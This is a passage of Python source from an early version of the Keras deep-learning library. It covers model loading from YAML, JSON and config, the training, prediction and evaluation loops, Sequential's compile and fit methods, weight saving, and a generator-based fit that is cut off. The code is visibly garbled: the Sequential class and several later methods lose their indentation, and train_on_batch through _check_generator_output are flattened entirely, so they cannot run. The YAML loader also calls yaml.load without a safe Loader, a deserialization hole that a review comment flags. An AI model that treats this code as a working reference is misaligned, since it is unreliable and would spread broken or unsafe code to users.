        return np.asarray([class_weight[cls] for cls in target_classes])
    # --- default: uniform weights ------------------------------------------
    if sample_weight_mode is None:
        return np.ones((y.shape[0],))
    return np.ones((y.shape[0], y.shape[1]))
def model_from_yaml(yaml_string, custom_objects={}):
    '''
    Returns a model generated from a local yaml file,
    which is either created by hand or from to_yaml method
    of Sequential or Graph

    NOTE(review): mutable default `custom_objects={}` — not mutated here,
    but fragile.
    '''
    import yaml
    # SECURITY NOTE(review): yaml.load without an explicit Loader can
    # instantiate arbitrary Python objects — never call this on untrusted
    # yaml (yaml.safe_load is the safe choice for plain config data).
    config = yaml.load(yaml_string)
    return model_from_config(config, custom_objects=custom_objects)
def model_from_json(json_string, custom_objects={}):
    """Parse a JSON model-config string (as produced by `to_json`) and
    build the model via `model_from_config`."""
    import json
    parsed = json.loads(json_string)
    return model_from_config(parsed, custom_objects=custom_objects)
def model_from_config(config, custom_objects={}):
    '''Build — and, when the config carries an optimizer, compile — a model
    from a configuration dict produced by `get_config`.

    :param config: dict with at least a 'name' key ('Graph' or 'Sequential').
    :param custom_objects: mapping of custom loss/layer names to objects,
        used to resolve non-builtin losses.
    NOTE(review): mutable default `custom_objects={}` — not mutated here.
    '''
    model_name = config.get('name')
    if model_name not in {'Graph', 'Sequential'}:
        raise Exception('Unrecognized model:', model_name)
    # Create a container then set class to appropriate model
    model = container_from_config(config, custom_objects=custom_objects)
    if model_name == 'Graph':
        model.__class__ = Graph
        model.name = model_name
    elif model_name == 'Sequential':
        model.__class__ = Sequential
        model.name = model_name
    if 'optimizer' in config:
        # if it has an optimizer, the model is assumed to be compiled
        loss = config.get('loss')
        # if a custom loss function is passed replace it in loss
        # (Graph: loss is a dict per output; Sequential: a single name)
        if model_name == 'Graph':
            for l in loss:
                for c in custom_objects:
                    if loss[l] == c:
                        loss[l] = custom_objects[c]
        elif model_name == 'Sequential' and loss in custom_objects:
            loss = custom_objects[loss]
        class_mode = config.get('class_mode')
        # the optimizer dict's 'name' entry selects the class; the
        # remaining entries are its keyword parameters
        optimizer_params = dict([(k, v) for k, v in config.get('optimizer').items()])
        optimizer_name = optimizer_params.pop('name')
        optimizer = optimizers.get(optimizer_name, optimizer_params)
        if model_name == 'Sequential':
            sample_weight_mode = config.get('sample_weight_mode')
            model.compile(loss=loss, optimizer=optimizer,
                          class_mode=class_mode, sample_weight_mode=sample_weight_mode)
        elif model_name == 'Graph':
            sample_weight_modes = config.get('sample_weight_modes', {})
            loss_weights = config.get('loss_weights', {})
            model.compile(loss=loss, optimizer=optimizer,
                          sample_weight_modes=sample_weight_modes,
                          loss_weights=loss_weights)
    return model
def get_function_name(o):
    """Return `o` unchanged when it is already a name (string),
    otherwise the callable's __name__."""
    return o if isinstance(o, six.string_types) else o.__name__
def generator_queue(generator, max_q_size=10,
                    wait_time=0.05, nb_worker=1):
    '''Builds a threading queue out of a data generator.
    Used in `fit_generator`, `evaluate_generator`.

    Returns (queue, stop_event).  Daemon worker threads pull items from
    `generator` into the queue until `stop_event` is set or the generator
    raises (the event is then set before the exception propagates).
    '''
    data_queue = queue.Queue()
    stop_event = threading.Event()

    def producer():
        while not stop_event.is_set():
            try:
                # keep at most max_q_size items buffered; back off when full
                if data_queue.qsize() >= max_q_size:
                    time.sleep(wait_time)
                    continue
                try:
                    item = next(generator)
                except ValueError:
                    # transient generator hiccup: retry
                    continue
                data_queue.put(item)
            except Exception:
                # let consumers know the producer died, then re-raise
                stop_event.set()
                raise

    for _ in range(nb_worker):
        worker = threading.Thread(target=producer)
        worker.daemon = True
        worker.start()
    return data_queue, stop_event
class Model(object):
    '''Abstract base model class.

    Provides the generic train/evaluate/predict loops shared by
    `Sequential` and `Graph`, plus config (de)serialization helpers.
    '''
    def _fit(self, f, ins, out_labels=[], batch_size=128,
             nb_epoch=100, verbose=1, callbacks=[],
             val_f=None, val_ins=None, shuffle=True, metrics=[]):
        '''
        Abstract fit function for f(ins).
        Assume that f returns a list, labelled by out_labels.

        # Arguments
            f: backend function computing one training step over a batch.
            ins: list of arrays (inputs + targets + sample weights).
            out_labels: names for the values `f` returns (e.g. ['loss', 'acc']).
            val_f, val_ins: optional evaluation function/data run at the end
                of every epoch.
            shuffle: True, False or 'batch' (shuffle in batch-sized chunks,
                required for HDF5 inputs).
            metrics: metric names advertised to the callbacks.

        NOTE(review): out_labels/callbacks/metrics are mutable default
        arguments; safe only because they are never mutated in place here.
        '''
        self.training_data = ins
        self.validation_data = val_ins
        do_validation = False
        if val_f and val_ins:
            do_validation = True
            if verbose:
                print('Train on %d samples, validate on %d samples' %
                      (len(ins[0]), len(val_ins[0])))
        nb_train_sample = len(ins[0])
        index_array = np.arange(nb_train_sample)
        self.history = cbks.History()
        # BaseLogger first so it aggregates before user callbacks run;
        # History last so it records the final epoch logs.
        callbacks = [cbks.BaseLogger()] + callbacks + [self.history]
        if verbose:
            callbacks += [cbks.ProgbarLogger()]
        callbacks = cbks.CallbackList(callbacks)
        callbacks._set_model(self)
        callbacks._set_params({
            'batch_size': batch_size,
            'nb_epoch': nb_epoch,
            'nb_sample': nb_train_sample,
            'verbose': verbose,
            'do_validation': do_validation,
            'metrics': metrics,
        })
        callbacks.on_train_begin()
        # may be flipped by callbacks (e.g. EarlyStopping)
        self.stop_training = False
        for epoch in range(nb_epoch):
            callbacks.on_epoch_begin(epoch)
            if shuffle == 'batch':
                index_array = batch_shuffle(index_array, batch_size)
            elif shuffle:
                np.random.shuffle(index_array)
            batches = make_batches(nb_train_sample, batch_size)
            for batch_index, (batch_start, batch_end) in enumerate(batches):
                batch_ids = index_array[batch_start:batch_end]
                try:
                    ins_batch = slice_X(ins, batch_ids)
                except TypeError:
                    raise Exception('TypeError while preparing batch. '
                                    'If using HDF5 input data, '
                                    'pass shuffle="batch".')
                batch_logs = {}
                batch_logs['batch'] = batch_index
                batch_logs['size'] = len(batch_ids)
                callbacks.on_batch_begin(batch_index, batch_logs)
                outs = f(ins_batch)
                if type(outs) != list:
                    outs = [outs]
                for l, o in zip(out_labels, outs):
                    batch_logs[l] = o
                callbacks.on_batch_end(batch_index, batch_logs)
                epoch_logs = {}
                if batch_index == len(batches) - 1:  # last batch
                    # validation
                    if do_validation:
                        # replace with self._evaluate
                        val_outs = self._test_loop(val_f, val_ins,
                                                   batch_size=batch_size,
                                                   verbose=0)
                        if type(val_outs) != list:
                            val_outs = [val_outs]
                        # same labels assumed
                        for l, o in zip(out_labels, val_outs):
                            epoch_logs['val_' + l] = o
            callbacks.on_epoch_end(epoch, epoch_logs)
            if self.stop_training:
                break
        callbacks.on_train_end()
        return self.history

    def _predict_loop(self, f, ins, batch_size=128, verbose=0):
        '''Abstract method to loop over some data in batches.

        Runs `f` batch by batch and assembles the per-batch outputs into
        full-size arrays (one per model output).
        '''
        nb_sample = len(ins[0])
        outs = []
        if verbose == 1:
            progbar = Progbar(target=nb_sample)
        batches = make_batches(nb_sample, batch_size)
        index_array = np.arange(nb_sample)
        for batch_index, (batch_start, batch_end) in enumerate(batches):
            batch_ids = index_array[batch_start:batch_end]
            ins_batch = slice_X(ins, batch_ids)
            batch_outs = f(ins_batch)
            if type(batch_outs) != list:
                batch_outs = [batch_outs]
            if batch_index == 0:
                # allocate full-size output arrays once per-output
                # shapes are known from the first batch
                for batch_out in batch_outs:
                    shape = (nb_sample,) + batch_out.shape[1:]
                    outs.append(np.zeros(shape))
            for i, batch_out in enumerate(batch_outs):
                outs[i][batch_start:batch_end] = batch_out
            if verbose == 1:
                progbar.update(batch_end)
        return outs

    def _test_loop(self, f, ins, batch_size=128, verbose=0):
        '''Abstract method to loop over some data in batches.

        Accumulates the scalar outputs of `f` weighted by batch size,
        then divides by the sample count — i.e. a per-sample average.
        '''
        nb_sample = len(ins[0])
        outs = []
        if verbose == 1:
            progbar = Progbar(target=nb_sample)
        batches = make_batches(nb_sample, batch_size)
        index_array = np.arange(nb_sample)
        for batch_index, (batch_start, batch_end) in enumerate(batches):
            batch_ids = index_array[batch_start:batch_end]
            ins_batch = slice_X(ins, batch_ids)
            batch_outs = f(ins_batch)
            if type(batch_outs) == list:
                if batch_index == 0:
                    # NOTE(review): iterating enumerate() here only serves to
                    # append one zero accumulator per output; tuples unused.
                    for batch_out in enumerate(batch_outs):
                        outs.append(0.)
                for i, batch_out in enumerate(batch_outs):
                    outs[i] += batch_out * len(batch_ids)
            else:
                if batch_index == 0:
                    outs.append(0.)
                outs[0] += batch_outs * len(batch_ids)
            if verbose == 1:
                progbar.update(batch_end)
        for i, out in enumerate(outs):
            outs[i] /= nb_sample
        return outs

    def get_config(self, verbose=0):
        '''Return the configuration of the model
        as a dictionary.
        To load a model from its configuration, use
        `keras.models.model_from_config(config, custom_objects={})`.
        '''
        # base layer/container config comes from the container superclass
        config = super(Model, self).get_config()
        for p in ['sample_weight_mode', 'sample_weight_modes', 'loss_weights']:
            if hasattr(self, p):
                config[p] = getattr(self, p)
        if hasattr(self, 'optimizer'):
            config['optimizer'] = self.optimizer.get_config()
        if hasattr(self, 'loss'):
            # store loss(es) by name so the config is serializable
            if type(self.loss) == dict:
                config['loss'] = dict([(k, get_function_name(v)) for k, v in self.loss.items()])
            else:
                config['loss'] = get_function_name(self.loss)
        if verbose:
            pp = pprint.PrettyPrinter(indent=4)
            pp.pprint(config)
        return config

    def to_yaml(self, **kwargs):
        '''Return a yaml string containing the model configuration.
        To load a model from a yaml save file, use
        `keras.models.from_yaml(yaml_string, custom_objects={})`.
        `custom_objects` should be a dictionary mapping
        the names of custom losses / layers / etc to the corresponding
        functions / classes.
        '''
        import yaml
        config = self.get_config()
        return yaml.dump(config, **kwargs)

    def to_json(self, **kwargs):
        '''Return a JSON string containing the model configuration.
        To load a model from a JSON save file, use
        `keras.models.from_json(json_string, custom_objects={})`.
        '''
        import json

        def get_json_type(obj):
            # if obj is any numpy type
            if type(obj).__module__ == np.__name__:
                return obj.item()
            # if obj is a python 'type'
            if type(obj).__name__ == type.__name__:
                return obj.__name__
            raise TypeError('Not JSON Serializable')

        config = self.get_config()
        return json.dumps(config, default=get_json_type, **kwargs)

    def summary(self):
        '''Print out a summary of the model architecture,
        include parameter count information.
        '''
        model_summary(self)
class Sequential(Model, containers.Sequential):
'''Linear stack of layers.
Inherits from containers.Sequential.
'''
def compile(self, optimizer, loss,
            class_mode=None,
            sample_weight_mode=None,
            **kwargs):
    '''Configure the learning process.

    # Arguments
        optimizer: str (name of optimizer) or optimizer object.
            See [optimizers](optimizers.md).
        loss: str (name of objective function) or objective function.
            See [objectives](objectives.md).
        class_mode: deprecated argument,
            it is set automatically starting with Keras 0.3.3.
        sample_weight_mode: if you need to do timestep-wise
            sample weighting (2D weights), set this to "temporal".
            "None" defaults to sample-wise weights (1D).
        kwargs: for Theano backend, these are passed into K.function.
            Ignored for Tensorflow backend.

    Builds the symbolic train/test/predict graphs and compiles the
    backend functions `_train`, `_train_with_acc`, `_predict`, `_test`,
    `_test_with_acc`.
    '''
    if class_mode is not None:
        warnings.warn('The "class_mode" argument is deprecated, please remove it from your code.')
    self.optimizer = optimizers.get(optimizer)
    self.sample_weight_mode = sample_weight_mode
    self.loss = objectives.get(loss)
    weighted_loss = weighted_objective(self.loss)
    # input of model
    self.X_train = self.get_input(train=True)
    self.X_test = self.get_input(train=False)
    self.y_train = self.get_output(train=True)
    self.y_test = self.get_output(train=False)
    # target of model
    self.y = K.placeholder(ndim=K.ndim(self.y_train))
    # weights placeholder: 2D (samples, timesteps) in temporal mode, else 1D
    if self.sample_weight_mode == 'temporal':
        self.weights = K.placeholder(ndim=2)
    else:
        self.weights = K.placeholder(ndim=1)
    # mask from the last layer (if it supports masking) feeds the loss
    if hasattr(self.layers[-1], 'get_output_mask'):
        mask = self.layers[-1].get_output_mask()
    else:
        mask = None
    train_loss = weighted_loss(self.y, self.y_train, self.weights, mask)
    test_loss = weighted_loss(self.y, self.y_test, self.weights, mask)
    # set class_mode, for accuracy computation:
    # (a single output unit means binary, otherwise categorical —
    # any user-supplied class_mode value is overridden here)
    if self.output_shape[-1] == 1:
        class_mode = 'binary'
    else:
        class_mode = 'categorical'
    self.class_mode = class_mode
    if class_mode == 'categorical':
        train_accuracy = K.mean(K.equal(K.argmax(self.y, axis=-1),
                                        K.argmax(self.y_train, axis=-1)))
        test_accuracy = K.mean(K.equal(K.argmax(self.y, axis=-1),
                                       K.argmax(self.y_test, axis=-1)))
    elif class_mode == 'binary':
        if self.loss.__name__ == 'categorical_crossentropy':
            warnings.warn('Your model output has shape ' + str(self.output_shape) +
                          ' (1-dimensional features), but you are using ' +
                          ' the `categorical_crossentropy` loss. You '
                          'almost certainly want to use `binary_crossentropy` instead.')
        train_accuracy = K.mean(K.equal(self.y, K.round(self.y_train)))
        test_accuracy = K.mean(K.equal(self.y, K.round(self.y_test)))
    # fold regularizer penalties into the training loss only
    for r in self.regularizers:
        train_loss = r(train_loss)
    updates = self.optimizer.get_updates(self.trainable_weights,
                                         self.constraints,
                                         train_loss)
    updates += self.updates
    # assemble backend-function input lists (multi-input vs single-input)
    if type(self.X_train) == list:
        train_ins = self.X_train + [self.y, self.weights]
        test_ins = self.X_test + [self.y, self.weights]
        assert type(self.X_test) == list
        predict_ins = self.X_test
    else:
        train_ins = [self.X_train, self.y, self.weights]
        test_ins = [self.X_test, self.y, self.weights]
        predict_ins = [self.X_test]
    self._train = K.function(train_ins, [train_loss],
                             updates=updates, **kwargs)
    self._train_with_acc = K.function(train_ins,
                                      [train_loss, train_accuracy],
                                      updates=updates, **kwargs)
    self._predict = K.function(predict_ins, [self.y_test],
                               updates=self.state_updates, **kwargs)
    self._test = K.function(test_ins, [test_loss],
                            updates=self.state_updates, **kwargs)
    self._test_with_acc = K.function(test_ins,
                                     [test_loss, test_accuracy],
                                     updates=self.state_updates, **kwargs)
def fit(self, X, y, batch_size=128, nb_epoch=100, verbose=1, callbacks=[],
        validation_split=0., validation_data=None, shuffle=True,
        show_accuracy=False, class_weight=None, sample_weight=None):
    '''Train the model for a fixed number of epochs.

    Returns a history object. Its `history` attribute is a record of
    training loss values at successive epochs,
    as well as validation loss values (if applicable).

    # Arguments
        X: data, as a numpy array.
        y: labels, as a numpy array.
        batch_size: int. Number of samples per gradient update.
        nb_epoch: int.
        verbose: 0 for no logging to stdout,
            1 for progress bar logging, 2 for one log line per epoch.
        callbacks: `keras.callbacks.Callback` list.
            List of callbacks to apply during training.
            See [callbacks](callbacks.md).
        validation_split: float (0. < x < 1).
            Fraction of the data to use as held-out validation data.
        validation_data: tuple (X, y) to be used as held-out
            validation data. Will override validation_split.
        shuffle: boolean or str (for 'batch').
            Whether to shuffle the samples at each epoch.
            'batch' is a special option for dealing with the
            limitations of HDF5 data; it shuffles in batch-sized chunks.
        show_accuracy: boolean. Whether to display
            class accuracy in the logs to stdout at each epoch.
        class_weight: dictionary mapping classes to a weight value,
            used for scaling the loss function (during training only).
        sample_weight: list or numpy array of weights for
            the training samples, used for scaling the loss function
            (during training only). You can either pass a flat (1D)
            Numpy array with the same length as the input samples
            (1:1 mapping between weights and samples),
            or in the case of temporal data,
            you can pass a 2D array with shape (samples, sequence_length),
            to apply a different weight to every timestep of every sample.
            In this case you should make sure to specify
            sample_weight_mode="temporal" in compile().
    '''
    # --- validate that inputs, targets and weights are sample-aligned
    if type(X) == list:
        if len(set([len(a) for a in X] + [len(y)])) != 1:
            raise Exception('All input arrays and the target array must '
                            'have the same number of samples.')
    else:
        if len(X) != len(y):
            raise Exception('The input data tensor (X) and '
                            'the target tensor (y) must have '
                            'the same number of samples. Found: '
                            'len(X) = {}, len(y) = {}'.format(len(X), len(y)))
    if sample_weight is not None:
        assert len(sample_weight) == len(y), ('"sample_weight" must have '
                                              'the same number of samples '
                                              'as X and y.')
    X = standardize_X(X)
    y = standardize_y(y)
    val_f = None
    val_ins = None
    # pick the evaluation function when any form of validation is requested
    if validation_data or validation_split:
        if show_accuracy:
            val_f = self._test_with_acc
        else:
            val_f = self._test
    if validation_data:
        # explicit validation set: (X_val, y_val) or (X_val, y_val, weights)
        if len(validation_data) == 2:
            X_val, y_val = validation_data
            if type(X_val) == list:
                assert len(set([len(a) for a in X_val] + [len(y_val)])) == 1
            else:
                assert len(X_val) == len(y_val)
            X_val = standardize_X(X_val)
            y_val = standardize_y(y_val)
            sample_weight_val = standardize_weights(y_val)
        elif len(validation_data) == 3:
            X_val, y_val, sample_weight_val = validation_data
            if type(X_val) == list:
                assert len(set([len(a) for a in X_val] +
                               [len(y_val), len(sample_weight_val)])) == 1
            else:
                assert len(X_val) == len(y_val) == len(sample_weight_val)
            X_val = standardize_X(X_val)
            y_val = standardize_y(y_val)
            sample_weight_val = standardize_weights(y_val,
                                                    sample_weight=sample_weight_val,
                                                    sample_weight_mode=self.sample_weight_mode)
        else:
            raise Exception('Invalid format for validation data; '
                            'provide a tuple (X_val, y_val) or '
                            '(X_val, y_val, sample_weight). '
                            'X_val may be a numpy array or a list of '
                            'numpy arrays depending on your model input.')
        val_ins = X_val + [y_val, sample_weight_val]
    elif 0 < validation_split < 1:
        # carve the validation set off the tail of the training data
        split_at = int(len(X[0]) * (1 - validation_split))
        X, X_val = (slice_X(X, 0, split_at), slice_X(X, split_at))
        y, y_val = (slice_X(y, 0, split_at), slice_X(y, split_at))
        if sample_weight is not None:
            sample_weight, sample_weight_val = (slice_X(sample_weight, 0, split_at), slice_X(sample_weight, split_at))
            sample_weight_val = standardize_weights(y_val,
                                                    sample_weight=sample_weight_val,
                                                    sample_weight_mode=self.sample_weight_mode)
        else:
            sample_weight_val = standardize_weights(y_val)
        val_ins = X_val + [y_val, sample_weight_val]
    if show_accuracy:
        f = self._train_with_acc
        out_labels = ['loss', 'acc']
    else:
        f = self._train
        out_labels = ['loss']
    sample_weight = standardize_weights(y, class_weight=class_weight,
                                        sample_weight=sample_weight,
                                        sample_weight_mode=self.sample_weight_mode)
    ins = X + [y, sample_weight]
    metrics = ['loss', 'acc', 'val_loss', 'val_acc']
    return self._fit(f, ins, out_labels=out_labels,
                     batch_size=batch_size, nb_epoch=nb_epoch,
                     verbose=verbose, callbacks=callbacks,
                     val_f=val_f, val_ins=val_ins,
                     shuffle=shuffle, metrics=metrics)
def predict(self, X, batch_size=128, verbose=0):
    '''Generate output predictions for the input samples
    batch by batch.

    # Arguments
        X: the input data, as a numpy array.
        batch_size: integer.
        verbose: verbosity mode, 0 or 1.
    # Returns
        A numpy array of predictions.
    '''
    inputs = standardize_X(X)
    # _predict_loop returns one array per model output; Sequential has one
    return self._predict_loop(self._predict, inputs, batch_size, verbose)[0]
def predict_proba(self, X, batch_size=128, verbose=1):
    '''Generate class probability predictions for the input samples
    batch by batch.

    # Arguments
        X: the input data, as a numpy array.
        batch_size: integer.
        verbose: verbosity mode, 0 or 1.
    # Returns
        A numpy array of probability predictions.
    '''
    probs = self.predict(X, batch_size, verbose)
    # sanity check only: values outside [0, 1] mean the output layer
    # is not actually producing probabilities
    if probs.min() < 0 or probs.max() > 1:
        warnings.warn('Network returning invalid probability values.')
    return probs
def predict_classes(self, X, batch_size=128, verbose=1):
    '''Generate class predictions for the input samples
    batch by batch.

    # Arguments
        X: the input data, as a numpy array.
        batch_size: integer.
        verbose: verbosity mode, 0 or 1.
    # Returns
        A numpy array of class predictions.
    '''
    proba = self.predict(X, batch_size=batch_size, verbose=verbose)
    if self.class_mode != 'categorical':
        # binary mode: threshold the single output unit at 0.5
        return (proba > 0.5).astype('int32')
    # categorical mode: index of the highest probability
    return proba.argmax(axis=-1)
def evaluate(self, X, y, batch_size=128, show_accuracy=False,
             verbose=1, sample_weight=None):
    '''Compute the loss on some input data, batch by batch.

    # Arguments
        X: input data, as a numpy array.
        y: labels, as a numpy array.
        batch_size: integer.
        show_accuracy: boolean; also return accuracy when True.
        verbose: verbosity mode, 0 or 1.
        sample_weight: sample weights, as a numpy array.
    '''
    # inputs, targets and weights must all be sample-aligned
    if type(X) == list:
        sizes = set(len(a) for a in X)
        sizes.add(len(y))
        if len(sizes) != 1:
            raise Exception('All input arrays and the target array must '
                            'have the same number of samples.')
    elif len(X) != len(y):
        raise Exception('The input data tensor (X) and '
                        'the target tensor (y) must have '
                        'the same number of samples. Found: '
                        'len(X) = {}, len(y) = {}'.format(len(X), len(y)))
    if sample_weight is not None:
        assert len(sample_weight) == len(y), ('"sample_weight" must have '
                                              'the same number of samples '
                                              'as X and y.')
    X = standardize_X(X)
    y = standardize_y(y)
    weights = standardize_weights(y, sample_weight=sample_weight,
                                  sample_weight_mode=self.sample_weight_mode)
    ins = X + [y, weights]
    test_fn = self._test_with_acc if show_accuracy else self._test
    outs = self._test_loop(test_fn, ins, batch_size, verbose)
    # with accuracy: [loss, acc]; otherwise just the scalar loss
    return outs if show_accuracy else outs[0]
def train_on_batch(self, X, y, accuracy=False,
class_weight=None, sample_weight=None):
'''Single gradient update over one batch of samples.
Returns the loss over the data,
or a tuple `(loss, accuracy)` if `accuracy=True`.
Arguments: see `fit` method.
'''
if type(X) == list:
if len(set([len(a) for a in X] + [len(y)])) != 1:
raise Exception('All input arrays and the target array must '
'have the same number of samples.')
else:
if len(X) != len(y):
raise Exception('The input data tensor (X) and '
'the target tensor (y) must have '
'the same number of samples. Found: '
'len(X) = {}, len(y) = {}'.format(len(X), len(y)))
if sample_weight is not None:
assert len(sample_weight) == len(y), ('"sample_weight" must have '
'the same number of samples '
'as X and y.')
X = standardize_X(X)
y = standardize_y(y)
sample_weight = standardize_weights(y, class_weight=class_weight,
sample_weight=sample_weight,
sample_weight_mode=self.sample_weight_mode)
ins = X + [y, sample_weight]
if accuracy:
return self._train_with_acc(ins)
else:
return self._train(ins)
def test_on_batch(self, X, y, accuracy=False, sample_weight=None):
'''Returns the loss over a single batch of samples,
or a tuple `(loss, accuracy)` if `accuracy=True`.
Arguments: see `fit` method.
'''
if type(X) == list:
if len(set([len(a) for a in X] + [len(y)])) != 1:
raise Exception('All input arrays and the target array must '
'have the same number of samples.')
else:
if len(X) != len(y):
raise Exception('The input data tensor (X) and '
'the target tensor (y) must have '
'the same number of samples. Found: '
'len(X) = {}, len(y) = {}'.format(len(X), len(y)))
if sample_weight is not None:
assert len(sample_weight) == len(y), ('"sample_weight" must have '
'the same number of samples '
'as X and y.')
X = standardize_X(X)
y = standardize_y(y)
sample_weight = standardize_weights(y, sample_weight=sample_weight,
sample_weight_mode=self.sample_weight_mode)
ins = X + [y, sample_weight]
if accuracy:
return self._test_with_acc(ins)
else:
return self._test(ins)
def predict_on_batch(self, X):
'''Returns predictions for a single batch of samples.
'''
ins = standardize_X(X)
return self._predict(ins)
def save_weights(self, filepath, overwrite=False):
'''Dump all layer weights to a HDF5 file.
'''
import h5py
import os.path
# if file exists and should not be overwritten
if not overwrite and os.path.isfile(filepath):
import sys
get_input = input
if sys.version_info[:2] <= (2, 7):
get_input = raw_input
overwrite = get_input('[WARNING] %s already exists - overwrite? '
'[y/n]' % (filepath))
while overwrite not in ['y', 'n']:
overwrite = get_input('Enter "y" (overwrite) or "n" (cancel).')
if overwrite == 'n':
return
print('[TIP] Next time specify overwrite=True in save_weights!')
f = h5py.File(filepath, 'w')
f.attrs['nb_layers'] = len(self.layers)
for k, l in enumerate(self.layers):
g = f.create_group('layer_{}'.format(k))
weights = l.get_weights()
g.attrs['nb_params'] = len(weights)
for n, param in enumerate(weights):
param_name = 'param_{}'.format(n)
param_dset = g.create_dataset(param_name, param.shape,
dtype=param.dtype)
param_dset[:] = param
f.flush()
f.close()
def load_weights(self, filepath):
'''Load all layer weights from a HDF5 save file.
'''
import h5py
f = h5py.File(filepath, mode='r')
for k in range(f.attrs['nb_layers']):
# This method does not make use of Sequential.set_weights()
# for backwards compatibility.
g = f['layer_{}'.format(k)]
weights = [g['param_{}'.format(p)] for p in range(g.attrs['nb_params'])]
self.layers[k].set_weights(weights)
f.close()
def _check_generator_output(self, generator_output, stop):
'''Validates the output of a generator. On error, calls
stop.set().
# Arguments
generator_output: output of a data generator.
stop: threading event to be called to
interrupt training/evaluation.
'''
if not hasattr(generator_output, '__len__'):
stop.set()
raise Exception('The generator output must be a tuple. Found: ' +
str(type(generator_output)))
if len(generator_output) == 2:
X, y = generator_output
if type(X) == list:
assert len(set([len(a) for a in X] + [len(y)])) == 1
else:
assert len(X) == len(y)
X = [X]
sample_weight = None
elif len(generator_output) == 3:
X, y, sample_weight = generator_output
if type(X) == list:
assert len(set([len(a) for a in X] +
[len(y), len(sample_weight)])) == 1
else:
assert len(X) == len(y) == len(sample_weight)
X = [X]
else:
stop.set()
raise Exception('The generator output tuple must have '
'2 or 3 elements.')
sample_weight = standardize_weights(y, sample_weight=sample_weight,
sample_weight_mode=self.sample_weight_mode)
return X, y, sample_weight
    def evaluate_generator(self, generator, val_samples, show_accuracy=False,
                           verbose=1, **kwargs):
        '''Evaluates the model on a generator. The generator should
        return the same kind of data with every yield as accepted
        by `evaluate`

        Arguments:
            generator:
                generator yielding dictionaries of the kind accepted
                by `evaluate`, or tuples of such dictionaries and
                associated dictionaries of sample weights.
            val_samples:
                total number of samples to generate from `generator`
                to use in validation.
            show_accuracy: whether to display accuracy in logs.
            verbose: verbosity mode, 0 (silent), 1 (per-batch logs),
                or 2 (per-epoch logs).
            kwargs: forwarded to `generator_queue` (e.g. worker count,
                wait time) — see that helper for supported keys.
        '''
        done_samples = 0
        all_outs = None  # lazily initialized once the output structure is known
        weights = []  # per-batch sample counts, for the weighted average below
        # run the generator in background thread(s); batches land in a queue
        q, _stop = generator_queue(generator, **kwargs)
        while done_samples < val_samples:
            X, y, sample_weight = self._check_generator_output(q.get(), _stop)
            do_samples = len(X[0])
            # evaluate the whole generated batch in one shot
            outs = self.evaluate(X, y, batch_size=do_samples,
                                 sample_weight=sample_weight,
                                 show_accuracy=show_accuracy,
                                 verbose=verbose)
            if show_accuracy:
                # outs is a list of outputs: accumulate each one separately
                if all_outs is None:
                    all_outs = [[] for _ in outs]
                for ox, out in enumerate(outs):
                    all_outs[ox].append(out)
            else:
                # outs is a single loss value
                if all_outs is None:
                    all_outs = []
                all_outs.append(outs)
            done_samples += do_samples
            weights.append(do_samples)
        # tell the generator thread(s) to terminate
        _stop.set()
        # average per-batch results, weighting by batch size
        if show_accuracy:
            return [np.average(outx, weights=weights)
                    for outx in all_outs]
        else:
            return np.average(np.asarray(all_outs),
                              weights=weights)
    def fit_generator(self, generator, samples_per_epoch, nb_epoch,
                      verbose=1, show_accuracy=False, callbacks=[],
                      validation_data=None, nb_val_samples=None,
                      class_weight=None,
                      nb_worker=1, nb_val_worker=None):
        '''Fit a model on data generated batch-by-batch by a Python generator.
        The generator is run in parallel to the model, for efficiency,
        and can be run by multiple workers at the same time.
        For instance, this allows you to do real-time data augmentation
        on images on CPU in parallel to training your model on GPU.

        # Arguments
            generator: a Python generator,
                yielding either (X, y) or (X, y, sample_weight).
                The generator is expected to loop over its data
                indefinitely. An epoch finishes when `samples_per_epoch`
                samples have been seen by the model.
                The output of the generator must be a tuple of either 2 or 3
                numpy arrays.
                If the output tuple has two elements, they are assumed to be
                (input_data, target_data).
                If it has three elements, they are assumed to be
                (input_data, target_data, sample_weight).
                All arrays should contain the same number of samples.
            samples_per_epoch: integer, number of samples to process before
                starting a new epoch.
            nb_epoch: integer, total number of iterations on the data.
            verbose: verbosity mode, 0, 1, or 2.
            show_accuracy: boolean. Whether to display accuracy (only relevant
                for classification problems).
            callbacks: list of callbacks to be called during training.
            validation_data: tuple of 2 or 3 numpy arrays, or a generator.
                If 2 elements, they are assumed to be (input_data, target_data);
                if 3 elements, they are assumed to be
                (input_data, target_data, sample weights). If generator,
                it is assumed to yield tuples of 2 or 3 elements as above.
                The generator will be called at the end of every epoch until
                at least `nb_val_samples` examples have been obtained,
                with these examples used for validation.
            nb_val_samples: number of samples to use from validation
                generator at the end of every epoch.
            class_weight: dictionary mapping class indices to a weight
                for the class.
            nb_worker: integer, number of workers to use for running
                the generator (in parallel to model training).
                If using multiple workers, the processing order of batches
                generated by the model will be non-deterministic.
                If using multiple workers, make sure to protect
                any thread-unsafe operation done by the generator
                using a Python mutex.
            nb_val_worker: same as `nb_worker`, except for validation data.
                Has no effect if no validation data or validation data is
                not a generator. If `nb_val_worker` is None, defaults to
                `nb_worker`.

        # Returns
            A `History` object.

        # Examples
        ```python
            def generate_arrays_from_file(path):
                while 1:
                    f = open(path)
                    for line in f:
                        # create numpy arrays of input data
                        # and labels, from each line in the file
                        x, y = process_line(line)
                        yield x, y
                    f.close()

            model.fit_generator(generate_arrays_from_file('/my_file.txt'),
                                samples_per_epoch=10000, nb_epoch=10)
        ```
        '''
        # TODO: make into kwargs?
        max_data_q_size = 10  # maximum number of batches in queue
        wait_time = 0.05  # in seconds
        epoch = 0
        do_validation = bool(validation_data)
        # python 2 has 'next', 3 has '__next__'
        # avoid any explicit version checks
        val_gen = (hasattr(validation_data, 'next') or
                   hasattr(validation_data, '__next__'))
        if val_gen and not nb_val_samples:
            raise Exception('When using a generator for validation data, '
                            'you must specify a value for "nb_val_samples".')
        if nb_val_worker is None:
            nb_val_worker = nb_worker
        if show_accuracy:
            out_labels = ['loss', 'acc']
        else:
            out_labels = ['loss']
        metrics = ['loss', 'acc', 'val_loss', 'val_acc']
        # prepare callbacks: BaseLogger first, History last, progress bar if verbose
        self.history = cbks.History()
        callbacks = [cbks.BaseLogger()] + callbacks + [self.history]
        if verbose:
            callbacks += [cbks.ProgbarLogger()]
        callbacks = cbks.CallbackList(callbacks)
        callbacks._set_model(self)
        callbacks._set_params({
            'nb_epoch': nb_epoch,
            'nb_sample': samples_per_epoch,
            'verbose': verbose,
            'do_validation': do_validation,
            'metrics': metrics,
        })
        callbacks.on_train_begin()
        # start generator thread storing batches into a queue
